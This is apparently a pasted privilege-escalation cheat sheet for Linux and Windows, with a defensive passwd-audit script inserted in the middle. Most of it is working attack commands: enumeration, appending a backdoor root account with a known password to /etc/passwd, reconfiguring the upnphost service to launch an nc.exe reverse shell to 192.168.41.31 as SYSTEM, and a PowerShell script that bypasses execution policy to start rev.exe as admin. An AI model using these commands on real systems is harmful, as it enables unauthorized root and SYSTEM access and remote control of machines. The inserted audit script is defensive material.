Untitled

UY-Scuti Jun 18th, 2019 119 Never
--- Linux ---

Website: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Script:
linuxprivchecker.py

Checking which services are running as root:
ps aux | grep root

Checking which jobs are scheduled:
ls -al /etc/cron*

Checking world-writable files:
find /etc/ -readable -type f -perm 777 2>/dev/null

Verifying file permissions (setuid files):
find / -perm -u=s -type f 2>/dev/null

Nmap interactive:
sudo nmap --interactive

Adding an alternate root account to the /etc/passwd file:
perl -le 'print crypt("foo", "aa")'
echo "aa:aaKNIEDOaueR6:0:0:aa:/aa:/bin/bash" >> /etc/passwd

Switching to the alternate root account:
su aa
foo

Switching to a root shell if the current user is a sudoer:
sudo /bin/bash

Notes:
- Check passwd file permissions; this is usually an easy way in.
- Check permissions on relevant important files; this usually throws errors due to improper permissions.

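Seen from the defender's side, the /etc/passwd entry appended above leaves two things an audit can catch: a second account with UID 0 and a password hash stored in the passwd file itself. The script below is an added example, not part of the original paste; the function names, the finding codes and the sample file contents are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the paste): audit passwd-format input for entries
# like the one appended above. Function names and finding codes are assumptions.
audit_passwd() {
    # Reads the named file(s), or stdin when called without arguments.
    awk -F: '
        /^#/ || NF == 0 { next }                   # comments, blank lines
        NF < 7  { print "MALFORMED " $1; next }    # passwd has 7 fields
        $3 == 0 && $1 != "root" { print "UID0_EXTRA " $1 }    # second root
        $2 == ""                { print "EMPTY_PASSWD " $1 }  # no password
        # A hash stored here bypasses /etc/shadow; x defers to it, * and ! lock
        $2 != "" && $2 != "x" && $2 !~ /^[*!]/ { print "HASH_INLINE " $1 }
    ' "$@"
}

# Succeeds when FILE is writable by group or others, which is the
# precondition for the append shown above when run as an unprivileged user.
loosely_writable() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]
}

# Constructed sample: stock entries plus the line from the echo command above.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
aa:aaKNIEDOaueR6:0:0:aa:/aa:/bin/bash
EOF
}

# Demo on the constructed sample, then a mode check on the live file.
sample_passwd | audit_passwd
if loosely_writable /etc/passwd; then
    echo "LOOSE_MODE /etc/passwd"
fi
```

Calling audit_passwd /etc/passwd runs the same checks against the live file.
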
--- Windows ---

Website: http://www.fuzzysecurity.com/tutorials/16.html

Checking the system's users:
net users
net user alice
net user bethany

Checking the running processes:
tasklist /SVC

Checking service configuration for a notoriously insecure service:
sc qc upnphost

Reconfiguring the UPnP Device Host service to run a binary of your choosing with SYSTEM privileges, in this case, nc.exe:
sc qc upnphost
sc config upnphost binPath= "C:\Users\Public\nc.exe -nv 192.168.41.31 443 -e C:\Windows\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
net start upnphost

Using PowerShell to RunAs an administrative user:
echo $secpasswd = ConvertTo-SecureString "" -AsPlainText -Force > run.ps1
echo $mycreds = New-Object System.Management.Automation.PSCredential ("admin", $secpasswd) >> run.ps1
echo $computer = "DANCING-PARROT" >> run.ps1
echo [System.Diagnostics.Process]::Start("C:\xampp\webdav\rev.exe","", >> run.ps1
echo $mycreds.Username, $mycreds.Password, $computer) >> run.ps1
powershell -ExecutionPolicy Bypass -File run.ps1